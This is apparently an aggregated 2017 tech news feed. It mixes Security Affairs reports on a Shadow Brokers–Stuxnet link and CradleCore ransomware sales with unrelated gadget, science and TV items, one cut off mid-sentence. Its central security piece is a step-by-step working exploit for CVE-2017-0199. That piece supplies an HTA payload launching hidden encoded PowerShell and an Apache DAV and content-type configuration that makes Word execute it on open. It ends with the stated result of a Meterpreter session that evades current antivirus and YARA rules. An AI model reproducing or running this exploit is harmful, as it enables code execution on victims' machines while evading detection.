News & Updates

Security researchers who analyzed the documents and hacking tools included in the last Shadow Brokers dump found a link to the Stuxnet virus.

On Friday, the Shadow Brokers leaked a new bunch of files belonging to the alleged NSA arsenal.

Security researchers who analyzed the documents and hacking tools included in the last dump have discovered many exploits specifically designed to compromise Windows systems.

Digging the archive, experts spotted a surprising exploit that was used in the Stuxnet cyber weapon, the malware used to destroy the Iranian nuclear programme in the Natanz plant.

According to Symantec researcher Liam O’Murchu, the exploit was developed for Windows’ MOF files and it is “almost the exact same script” used in Stuxnet.

“There is a strong connection between Stuxnet and the Shadow Brokers dump,” O’Murchu told Motherboard in an email. “But not enough to definitively prove a connection.”

Let’s see the similarities between the Stuxnet code and the exploit code in the last dump leaked by Shadow Brokers.

Below a portion of the script from Stuxnet.

Stuxnet code vs Shadow Brokers exploit

and this is a portion of the script dumped by The Shadow Brokers.

Of course, who has developed the tool included in the Shadow Brokers dump may have borrowed the script from the public knowledge of Stuxnet. The same code, for example, was included in the Metasploit framework allowing anyone to create a MOF file like the one exploited in Stuxnet attack.

O’Murchu highlighted that the MOF file creation tool in the Shadow Brokers dump presented a last compiled date set on September 9, 2010, a few months Stuxnet discovery, but “shortly before the code was added to Metasploit.”

The researcher Kevin Beaumont believe that there is link between Stuxnet and the exploit shared by Shadow Brokers.

Lorenzo Franceschi-Bicchierai from Motherboard also reported that the Avast Antivirus detects some exploits in the Shadow Brokers dump as Stuxnet.

It is very curious, even in the case of false positive that the signatures of the exploits match the Stuxnet’s one.

Are we facing with the evidence that the NSA-linked Equation Group was involved in the Stuxnet attack, or is this a well organized false-flag operation?

“Therefore, the Stuxnet MOF file creation tool that the Shadow Brokers dropped on Friday is possibly the earliest technical evidence that NSA hackers and developers coded Stuxnet, as many suspect.” added Bicchierai.

medianet_width=’300′; medianet_height= ‘250’; medianet_crid=’762221962′;

Pierluigi Paganini

(Security Affairs – NSA, Shadow Brokers)

The post The alleged link between the Shadow Brokers data leak and the Stuxnet cyber weapon appeared first on Security Affairs.

Source: Security affairs

CradleCore ransomware is a malware offered in the underground as a source code, instead of the classic ransomware-as-a-service (RaaS) model.

According to the experts at Forcepoint, the author is offering the malware in many Tor-based crime forums as source code allowing crooks to request a customized version of the code.

The CradleCore ransomware is offered by the author as a C++ source code along with the necessary PHP web server scripts and a payment panel, the malware goes for 0.35 Bitcoin (around $400) but the price is negotiable.

“Typically, ransomware is monetized by developers using the RaaS business model. If that doesn’t work, only then the will the developers consider selling the source code.” reads the analysis published by Forcepoint.

CradleCore is offered as a C++ source code with PHP server scripts and a payment panel. It started to be sold on a few Tor-based sites over two weeks ago for a negotiable price starting at 0.35 BTC (approximately 428 USD)”

According to the experts, this model of sale will lead to the development of new variants derived from CradleCore.

The ransomware is offered with a relatively complete feature set, it uses Blowfish for file encryption and allows offline encryption too.

The malicious code implements an anti-sandbox mechanism and communicates to command and control server via a Tor2Web gateway.

Once infected a system, the CradleCore ransomware encrypts files and to drops a ransom note on the system. When the malware encrypts the files it appends the .cradle extension to them.

CradleCore Ransomware

Experts from Forcepoint that analyzed the readme file, believe that the author of the malware is a developer without a significant experience in malware coding.

The researchers discovered more about the author by conducting further analysis on the advertisement site for CradleCore ransomware.

“While the advertisement site for CradleCore is hosted on the dark web, the site’s Apache server status page appears to be accessible to the public. The logs appeared to show that the Apache server hosting the Onion site has a second Virtual Host (VHost) hosting a clearnet website. VHosts, to those unfamiliar, allow multiple websites to be hosted on a single machine and IP address:” reads the analysis.

“The Linode-assigned IP address hosting the clearnet site appears to be exclusive-use. Essentially, this could mean either that the server is compromised and is abused to host the CradleCore website or that the clearnet website and CradleCore belong to the same owner.

Digging around the contents of that clearnet website led us to the website owner’s personal site who appears to be working as a freelance software developer. From the information available on his personal website we managed to find his Twitter and LinkedIn account where it is indicated that he is a C++ programmer.”

Of course, this means that the owner of the clearnet site that is used to sell the ransomware is linked to a freelance C++ developer, but there is no proof that he is also the coder.

Concluding Forcepoint researchers believe the ransomware may be the first project of a novice malware developer.

“CradleCore is yet another new ransomware product that is available to cybercriminals. It is being sold as source code which potentially suggests that CradleCore may be a first- or side-project of someone with limited experience of malware business models looking for extra income. It also means that anyone who purchases it will not only be able to update the ransomware but also share the source code to others,” Forcepoint says.

medianet_width=’300′; medianet_height= ‘250’; medianet_crid=’762221962′;

Pierluigi Paganini

(Security Affairs – CradleCore ransomware, cybercrime)

The post Who is offering the CradleCore Ransomware as source code? appeared first on Security Affairs.

Source: Security affairs

Enlarge (credit: Evelyn Wang/MIT)

Luke Skywalker may have been unimpressed with the life of a Tatooine moisture farmer, but a simple device that could economically harvest water from desert air would really be pretty exciting. According to Wookieepedia, the “moisture vaporators” the young Skywalker tended utilized refrigeration coils to chill air to the dew point and collect the water that condensed. We can certainly do that today (as they could “a long time ago… ”), but the amount of energy required makes collecting condensation impractical.

Enter a new study device developed by MIT’s Hyunho Kim. His idea is to work with a unique class of materials called “metal-organic frameworks.” Organic, carbon-based molecules form links between metallic ions to create interesting 3D structures that can have lots of open space internally. This allows the structures to do strange things, like make a high-pressure tank hold far more hydrogen gas after it’s first filled with granules of the right metal-organic framework material.

Kim worked with a zirconium oxide paired with an organic molecule. The combination has the useful quality of grabbing and holding on to water vapor at lower temperatures, but also letting go of that water as the heat rises. So the basic idea is that a device based on this material could passively harvest water vapor from the air at night and then release it (to be collected) in the heat of the day.

Read 6 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

The Security expert David Routin (@Rewt_1) has detailed a step by step procedure to exploit the recently patched cve-2017-0199 vulnerability exploited in Windows attacks in the wild.

Introduction

Since several days the security community has been informed thanks to FireEye publication of different malware campaigns (Dridex…) leveraging the CVE-2017-0199.
Several other publications were related to this vulnerability but no working exploit was published.
After digging a while I found the way to exploit this vulnerability in an easy way, which seems to be a bit different than the current works already done by other researchers.

I decided to publish this work as Microsoft officially published a patch on 11 of Apr 2017.

Technical background

It is possible to include OLEv2 links to existing documents.
These objects (once included) will reflect the current content of the source link once loaded in the document.
What is amazing is that if you try to include HTA link as an OLEv2 object it will be executed once (at the creation) but WinWord will return an error like:
CVE-2017-0199 1
The problem in this case is that the HTA file will not be persistent (to make it persistent you would have had to Link it with file + create icon but we want to be stealth and to have autorun right ?)

After thinking a while I started by thinking how to handle a real, not malicious OLE object link to a remote RTF file… To achieve i had to play a little bit with content-type and DAV module in Apache to serve my file in the “proper” Microsoft Office expected way… (this will be discussed in next chapters).
From there, I will have a valid embedded Object link automatically updated after each open of my document!

Next step? Modify the document at the source with my payload in HTA!?!

In this scenario, I was able to:
– Create a  dynamic OLEv2 object link for a real RTF file
– Modify the RTF at the source with my payload
– Bypass the error generated if I wanted to create a direct link to HTA document

Another issue? The OLE object needed to be activated automatically!

I had much help to solve all these issues relaying on different articles in the reference part! Thanks to Didier Stevens blog, Vincent Yiu (mainly inspired by its article), Nvisio labs, FireEye and obviously… Microsoft 🙂

Step 1 

Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript)
Let’s call it “ms.hta

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
   <html xmlns="http://www.w3.org/1999/xhtml">  
   <head>  
   <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />  
   <title>Bonjour</title>  
 <script language="VBScript">  
  Set owFrClN0giJ = CreateObject("Wscript.Shell")   
  Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")  
  If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..powershell.exe") Then  
   owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"  
  End If  
 </script>  
 <hta:application  
     id="oHTA"  
     applicationname="Bonjour"  
     application="yes"  
   >  
   </hta:application>  
   </head>  
   <div>   
   <object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">  
   </object></div>    
   <body>  
   </body>  
   </html>  

Step 2

Create a simple RTF document using Winword with the any random content. (in our example the string “This is my official and legit content”)

Call it “ms.rtf

Step 3

Push these 2 files on a webserver you have full control on.
We supposed it will be stored in /var/www/html

Now we have to configure Apache to be able to include the ms.rtf as a link

 a2enmod dav  
 a2enmod dav_fs  
 a2enmod dav_lock  
 a2enmod headers  
 service apache2 restart  

The following directive will:
– Add “Content-Type application/rtf to all files in /ms
– Allow the PROPFIND request performed by Microsoft Office

 Modify virtualhost and include:

 <Directory /var/www/html/ms/>  
 Header set Content-Type "application/rtf"  
 </Directory>  
 <Directory />  
 Dav on  
 </Directory>  
service apache2 restart


Step 4

Create a simple RTF document using Winword “exploit.rtf” This will be our exploit !

Insert -> Object

 CVE-2017-0199 2
CVE-2017-0199 Creation of OLEv2 external link

After clicking OK you will get the content of the “ms.rtf” file which just contains a random string..

Save the file as “exploit.rtf

 CVE-2017-0199 3
CVE-2017-0199 Olev2 link object created

At this step we can close Winword and go to the next step for changing the content of ms.rtf with the HTA payload…

Step 5

The following step will :
– change the ms.rtf that we have included with the custom HTA payload
– The web server will send a “application/hta” content-type… this will be interpreted by the Winword client which will run mshta to handle this content-type and execute our payload

 cat /var/www/html/ms/ms.hta > /var/www/html/ms.rtf  

 vi /etc/apache2/sites-enables/000-default  
 Change -> application/rtf to application/hta  
 like:  
 
 <Directory /var/www/html/ms/>  
 Header set Content-Type "application/hta"  
 </Directory>  

 service apache2 restart  

Step 6

At this step, if the user opens the “exploit.rtf” file he will have to double click on the link object to launch the attack…

If we want the OLE object to be loaded automatically at the opening of the document we have to edit the exploit.rtf file and change:

to
objectobjautlinkobjupdatersltpict……………………..



At this step the exploit is built.

Exploitation:

Once the user open the document the OLE object is updated through the link and mshta is execute thanks to the application/hta content-type delivered by the server
Result: code is executed!

Meterpreter is here!
CVE-2017-0199 4

We don’t care about the warning as the code was already executed…

 CVE-2017-0199 5
CVE-2017-0199 Exploited ! warning after execution


Detection using current AV/published YARA rules

From my personal tests it seems that this method is not currently catched by AV (Defender already have signature for CVE-2017-0199)

Additionnally current published yara rules does not match this exploit

rule rtf_objdata_urlmoniker_http {
strings:
$header = “{rtf1”
$objdata = “objdata 0105000002000000” nocase
$urlmoniker = “E0C9EA79F9BACE118C8200AA004BA90B” nocase
$http = “68007400740070003a002f002f00” nocase
condition:
$header at 0 and $objdata and $urlmoniker and $http
}


Indeed urlmoniker does not match, which will never trigger this Yara rule.

References

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html
https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/

About the author David Routin

David Routin is CISO for a Swiss security company, he has been working as security expert with offensive and defensive security approach  for more than ten years including various vulnerability research

medianet_width=’300′; medianet_height= ‘250’; medianet_crid=’762221962′;

Edited by Pierluigi Paganini

(Security Affairs –  Windows zero-day attacks, CVE-2017-0199)

The post Windows attacks via CVE-2017-0199 – Practical exploitation! (PoC) appeared first on Security Affairs.

Source: Security affairs

Enlarge / The iPad Air 2 (left) next to the iPad Air (right). (credit: Andrew Cunningham)

If you take your fourth-generation iPad into Apple for a repair, the company may replace your tablet with a newer iPad Air 2 instead. According to an internal memo published by MacRumors, Apple started doing this on March 30, right around when the $329 iPad became available to purchase.

Starting March 30, iPad 4th generation whole unit repairs may be substituted to iPad Air 2 models. Apple’s repair and order management tool will indicate for each repair if a substitution will take place. Please note the substitute part’s color and capacity to ensure the customer understands what their replacement iPad whole unit will be.

While you may get a new color and capacity, we also assume that customers with Smart Covers or other accessories for their fourth-generation iPads will need to buy new accessories for the iPad Air 2; we’ve contacted Apple for clarification and will update if we get a response.

The iPad Air 2 is two years newer than an iPad 4—it’s significantly thinner, lighter, and faster, and it support iOS features like multitasking than the iPad 4 isn’t capable of. More importantly, it’s certain to be supported by the next major version of iOS, while the iPad 4 is more than likely to be dropped from the support list. Apple is likely running out of parts and replacement tablets for the older iPad, while the only-recently-discontinued iPad Air 2 is still available in abundance in Apple’s refurbished store.

Read 1 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

A Chinese infosec researcher has discovered a new “almost impossible to detect” phishing attack that can be used to trick even the most careful users on the Internet.

He warned, Hackers can use a known vulnerability in the Chrome, Firefox and Opera web browsers to display their fake domain names as the websites of legitimate services, like Apple, Google, or Amazon to steal login or financial


Source: http://feeds.feedburner.com/TheHackersNews

“Better Call Saul” Season 3 Episode 2 synopsis reveals that Chuck will chalk out a big plan and use law against Jimmy so as to trap him. On the other hand, Mike is trying hard to prepare himself for something big and is not looking for a mysterious acquaintance. Check out in detail! “Better Call […]

The post ‘Better Call Saul’ Season 3 Episode 2 Synopsis: Chuck’s Use Of Law Against Jimmy; Mike’s Mystery appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/

As Apple fans continue to wait patiently for iPad Pro 2, more and more rumors hinting at iPad Pro 2 features are making rounds on the internet. It looks like the much-awaited iPad Pro 2 will be the best Apple has designed so far, with top-of-the-line specs and features. Unlike the brand new affordable tablet […]

The post iPad Pro 2 To Feature Touch Bar, Bezel-Free Display And Foldable Design; Will It Replace MacBook? appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/

Black Holes continue to remain Universe’s spectacular enigma. The only person who came close to describing their behavior with a few set of mathematical equations is none other than India’s mathematical genius Srinivasa Ramanujan – The Man Who Knew Infinity. Long after Srinivasa Ramanujan outlined the mathematical framework, in 2012 a US scientist proved the […]

The post First Picture Of A Black Hole Finally Snapped; Sagittarius A* Captured In All Its Glory appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/

It’s a good start to the week for the Canadian residents with the Samsung Galaxy Note 5 and S6 Edge Plus. All major carriers in the country are seeding the Android 7.0 Nougat update to the said devices. The list of telecom operators includes Virgin, Videotron, Bell, Koodo mobile, Sasktel, and Telus. Just a few days ago, Verizon […]

The post Galaxy Note 5 and Galaxy S6 Edge Plus Receive Android 7.0 Nougat Update in Canada appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/